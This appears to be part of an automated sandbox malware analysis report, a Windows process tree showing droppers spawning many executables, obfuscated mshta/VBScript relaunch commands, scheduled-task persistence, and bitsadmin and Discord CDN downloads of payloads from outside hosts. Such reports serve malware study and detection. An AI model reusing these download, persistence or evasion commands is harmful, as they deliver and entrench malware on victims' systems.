PID:5744
-
-
C:\Users\Admin\Pictures\Adobe Films\MiFnSOOP3jL2bVNTqswI6fwY.exe"C:\Users\Admin\Pictures\Adobe Films\MiFnSOOP3jL2bVNTqswI6fwY.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6492
-
-
C:\Users\Admin\Pictures\Adobe Films\cyuN1_FPvN4XqHx5jHqquG4S.exe"C:\Users\Admin\Pictures\Adobe Films\cyuN1_FPvN4XqHx5jHqquG4S.exe"7⤵PID:6464
-
-
C:\Users\Admin\Pictures\Adobe Films\l9hzlz9ZLt7XuMB8ACGsfFI8.exe"C:\Users\Admin\Pictures\Adobe Films\l9hzlz9ZLt7XuMB8ACGsfFI8.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6452
-
-
C:\Users\Admin\Pictures\Adobe Films\JFsLr_kYtI5uwpoVO5P9lW6c.exe"C:\Users\Admin\Pictures\Adobe Films\JFsLr_kYtI5uwpoVO5P9lW6c.exe"7⤵PID:6432
-
C:\Users\Admin\Documents\Eis8rgwPfplaNhGmdMf5sxxc.exe"C:\Users\Admin\Documents\Eis8rgwPfplaNhGmdMf5sxxc.exe"8⤵
- Checks computer location settings
PID:5776 -
C:\Users\Admin\Pictures\Adobe Films\OrYBZcRWcgHzIxQuvrmVk6aL.exe"C:\Users\Admin\Pictures\Adobe Films\OrYBZcRWcgHzIxQuvrmVk6aL.exe"9⤵PID:7116
-
-
C:\Users\Admin\Pictures\Adobe Films\fyLnniPK_2OpBz3Y2dvMpj4C.exe"C:\Users\Admin\Pictures\Adobe Films\fyLnniPK_2OpBz3Y2dvMpj4C.exe"9⤵PID:6088
-
-
C:\Users\Admin\Pictures\Adobe Films\eRnDf2CSvKqVjRsdrizTS0l9.exe"C:\Users\Admin\Pictures\Adobe Films\eRnDf2CSvKqVjRsdrizTS0l9.exe"9⤵PID:2320
-
-
C:\Users\Admin\Pictures\Adobe Films\Uu8ktdPLBFcY1iPXMPwESBiH.exe"C:\Users\Admin\Pictures\Adobe Films\Uu8ktdPLBFcY1iPXMPwESBiH.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4496
-
-
C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"9⤵
- Checks whether UAC is enabled
PID:6868 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
- Checks whether UAC is enabled
PID:5136 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\c9ERkf7LMTbBMG3_wz5MOpln.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:1544
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "c9ERkf7LMTbBMG3_wz5MOpln.exe"12⤵
- Kills process with taskkill
PID:4936
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe"C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe"9⤵PID:5712
-
C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe"C:\Users\Admin\Pictures\Adobe Films\qUEUTCQ1XHI9Jzt7MPwLMwfe.exe" -u10⤵PID:1324
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xyNtQmrvs194C2q9XHvjvThR.exe"C:\Users\Admin\Pictures\Adobe Films\xyNtQmrvs194C2q9XHvjvThR.exe"9⤵PID:5628
-
-
C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"9⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\is-E2TS2.tmp\tJWpYBfBdpnOujp6qGKB_GWA.tmp"C:\Users\Admin\AppData\Local\Temp\is-E2TS2.tmp\tJWpYBfBdpnOujp6qGKB_GWA.tmp" /SL5="$5030C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\tJWpYBfBdpnOujp6qGKB_GWA.exe"10⤵
- Loads dropped DLL
- Checks whether UAC is enabled
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\is-KHKDU.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-KHKDU.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:1248 -
C:\Program Files\Windows Security\ODBLXPRXLV\foldershare.exe"C:\Program Files\Windows Security\ODBLXPRXLV\foldershare.exe" /VERYSILENT12⤵
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
PID:6152
-
-
C:\Users\Admin\AppData\Local\Temp\bf-eb2d8-8db-c43b9-ac517c6b472ed\Vyzharogaewi.exe"C:\Users\Admin\AppData\Local\Temp\bf-eb2d8-8db-c43b9-ac517c6b472ed\Vyzharogaewi.exe"12⤵
- Checks computer location settings
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\6d-c4a2c-988-06c9e-aceb445de7633\Qaehoxekile.exe"C:\Users\Admin\AppData\Local\Temp\6d-c4a2c-988-06c9e-aceb445de7633\Qaehoxekile.exe"12⤵
- Checks whether UAC is enabled
PID:3972 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe /eufive & exit13⤵PID:6200
-
C:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\k5wew0w2.tlj\GcleanerEU.exe /eufive14⤵PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:7532
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:6584
-
-
C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exeC:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe /qn CAMPAIGN="654"14⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7452 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b2fim0sd.mlf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634218862 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵PID:9124
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe & exit13⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exeC:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe14⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe"C:\Users\Admin\AppData\Local\Temp\lnsshwxs.c1l\any.exe" -u15⤵PID:8720
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe /mixfive & exit13⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qqh4tnh5.xnx\gcleaner.exe /mixfive14⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe /S & exit13⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\waxbv2a2.2rk\autosubplayer.exe /S14⤵
- Drops file in Program Files directory
PID:4888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵PID:8780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵PID:7036
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵PID:764
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵
- Blocklisted process makes network request
PID:8720
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵PID:1660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵PID:4108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Loads dropped DLL
PID:4216
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn3591.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
PID:1652 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:6848
-
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
PID:6020
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe"C:\Users\Admin\Pictures\Adobe Films\uSCjYmPU3CH3QGpDJ1ZL8Fwr.exe"9⤵
- Loads dropped DLL
PID:1016 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:8056 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
- Checks whether UAC is enabled
PID:8884 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x58,0x1d4,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee012⤵PID:8620
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff79e239e70,0x7ff79e239e80,0x7ff79e239e9013⤵PID:7524
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1736,3650273477745804929,15538392481981902781,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8884_81560480" --mojo-platform-channel-handle=1752 /prefetch:812⤵PID:8060
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7224
-
-
-
C:\Users\Admin\Pictures\Adobe Films\G_qlYSMI3UpBnqt1rgDYiWfA.exe"C:\Users\Admin\Pictures\Adobe Films\G_qlYSMI3UpBnqt1rgDYiWfA.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:6856 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:1548
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NpNokgBUio4juQ1WHkiRptUG.exe"C:\Users\Admin\Pictures\Adobe Films\NpNokgBUio4juQ1WHkiRptUG.exe"7⤵PID:6796
-
-
C:\Users\Admin\Pictures\Adobe Films\EfYzouvnW3iAXodDye6sK70I.exe"C:\Users\Admin\Pictures\Adobe Films\EfYzouvnW3iAXodDye6sK70I.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6684
-
-
C:\Users\Admin\Pictures\Adobe Films\KvYEBWEa6dj4FEFN49knLnSU.exe"C:\Users\Admin\Pictures\Adobe Films\KvYEBWEa6dj4FEFN49knLnSU.exe"7⤵PID:6672
-
-
C:\Users\Admin\Pictures\Adobe Films\EoOquW8c4Vfj_NvcnA6gXyuN.exe"C:\Users\Admin\Pictures\Adobe Films\EoOquW8c4Vfj_NvcnA6gXyuN.exe"7⤵
- Checks whether UAC is enabled
PID:6664
-
-
C:\Users\Admin\Pictures\Adobe Films\LgGY89P792Li7mvFxyF8GrqY.exe"C:\Users\Admin\Pictures\Adobe Films\LgGY89P792Li7mvFxyF8GrqY.exe"7⤵
- Checks whether UAC is enabled
PID:6612 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵PID:5076
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:2252
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8QS5QO54Pu7CmqPq1QMNVpdP.exe"C:\Users\Admin\Pictures\Adobe Films\8QS5QO54Pu7CmqPq1QMNVpdP.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6604
-
-
C:\Users\Admin\Pictures\Adobe Films\u3cRqTdVGtXPgh8ADvnvPDLI.exe"C:\Users\Admin\Pictures\Adobe Films\u3cRqTdVGtXPgh8ADvnvPDLI.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6592
-
-
C:\Users\Admin\Pictures\Adobe Films\PxZ8UI6mifYkoYl3a6RLFIRc.exe"C:\Users\Admin\Pictures\Adobe Films\PxZ8UI6mifYkoYl3a6RLFIRc.exe"7⤵PID:6584
-
-
C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"7⤵
- Suspicious use of SetThreadContext
PID:6548 -
C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"8⤵PID:7396
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mbqtmEoq2yLOhYkBnJknXxjC.exe"C:\Users\Admin\Pictures\Adobe Films\mbqtmEoq2yLOhYkBnJknXxjC.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6852
-
-
C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"7⤵
- Suspicious use of SetThreadContext
PID:6948 -
C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"8⤵PID:5048
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe"C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe"7⤵PID:6644
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\4EE4.bat "C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe""8⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""9⤵PID:8140
-
-
C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""9⤵PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""9⤵PID:7640
-
-
C:\Users\Admin\AppData\Local\Temp\4582\18.exe18.exe9⤵PID:7980
-
-
C:\Users\Admin\AppData\Local\Temp\4582\Transmissibility.exeTransmissibility.exe9⤵PID:7916
-
-
C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "" "" "" "" "" "" "" "" ""9⤵PID:4888
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FVg5dIcYh8MQcezkMZUKRnJw.exe"C:\Users\Admin\Pictures\Adobe Films\FVg5dIcYh8MQcezkMZUKRnJw.exe"7⤵
- Checks whether UAC is enabled
PID:6832 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\demimondaines.vbs"8⤵PID:7556
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq9⤵
- Checks whether UAC is enabled
PID:7624 -
C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5468 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"11⤵PID:2556
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RmAEbkxy08cLllgKYBk96wod.exe"C:\Users\Admin\Pictures\Adobe Films\RmAEbkxy08cLllgKYBk96wod.exe"7⤵PID:2632
-
-
C:\Users\Admin\Pictures\Adobe Films\vRPeoOe1mIWiEt7qCOcg_mkL.exe"C:\Users\Admin\Pictures\Adobe Films\vRPeoOe1mIWiEt7qCOcg_mkL.exe"7⤵
- Loads dropped DLL
PID:5608 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
PID:8052 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"9⤵
- Checks whether UAC is enabled
PID:8304 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee010⤵PID:7700
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,5525722587339380748,4767359402503815464,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8304_2109337628" --mojo-platform-channel-handle=1848 /prefetch:810⤵PID:2132
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,5525722587339380748,4767359402503815464,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8304_2109337628" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1780 /prefetch:210⤵PID:6252
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon173a360b525.exeMon173a360b525.exe6⤵
- Executes dropped EXE
PID:5008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1378909358.exe"7⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\1378909358.exe"C:\Users\Admin\AppData\Local\Temp\1378909358.exe"8⤵PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6286259440.exe"7⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\6286259440.exe"C:\Users\Admin\AppData\Local\Temp\6286259440.exe"8⤵
- Executes dropped EXE
PID:5940
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon173a360b525.exe" & exit7⤵PID:7320
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon173a360b525.exe" /f8⤵
- Kills process with taskkill
PID:6508
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe5⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe6⤵
- Executes dropped EXE
- Checks computer location settings
PID:988 -
C:\Users\Admin\Pictures\Adobe Films\mTeABXpBzcGCUGPGqC7x3nV1.exe"C:\Users\Admin\Pictures\Adobe Films\mTeABXpBzcGCUGPGqC7x3nV1.exe"7⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5912 -
C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"8⤵PID:7272
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JaCAPd06FlDmrpOxihzFv2Ya.exe"C:\Users\Admin\Pictures\Adobe Films\JaCAPd06FlDmrpOxihzFv2Ya.exe"7⤵
- Executes dropped EXE
PID:4692
-
-
C:\Users\Admin\Pictures\Adobe Films\CXGvGSzadJsTx1qTxImyPp7A.exe"C:\Users\Admin\Pictures\Adobe Films\CXGvGSzadJsTx1qTxImyPp7A.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6184
-
-
C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1372
-
-
C:\Users\Admin\Pictures\Adobe Films\W9xWu_AEnKs623Q9RYQ1dIrL.exe"C:\Users\Admin\Pictures\Adobe Films\W9xWu_AEnKs623Q9RYQ1dIrL.exe"7⤵
- Executes dropped EXE
PID:2928
-
-
C:\Users\Admin\Pictures\Adobe Films\ejmyMi7AtBevIn8DRICZl6av.exe"C:\Users\Admin\Pictures\Adobe Films\ejmyMi7AtBevIn8DRICZl6av.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:6732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:1988
-
-
C:\Users\Admin\Documents\GnF7HaoQK81Ivyv8nyx9jPhh.exe"C:\Users\Admin\Documents\GnF7HaoQK81Ivyv8nyx9jPhh.exe"8⤵PID:7424
-
C:\Users\Admin\Pictures\Adobe Films\zMjI_8K8Q84OeL8sLmItXmSr.exe"C:\Users\Admin\Pictures\Adobe Films\zMjI_8K8Q84OeL8sLmItXmSr.exe"9⤵PID:1316
-
-
C:\Users\Admin\Pictures\Adobe Films\MP3j7z4lRZhS6aiY4zSqJ4fH.exe"C:\Users\Admin\Pictures\Adobe Films\MP3j7z4lRZhS6aiY4zSqJ4fH.exe"9⤵PID:7080
-
-
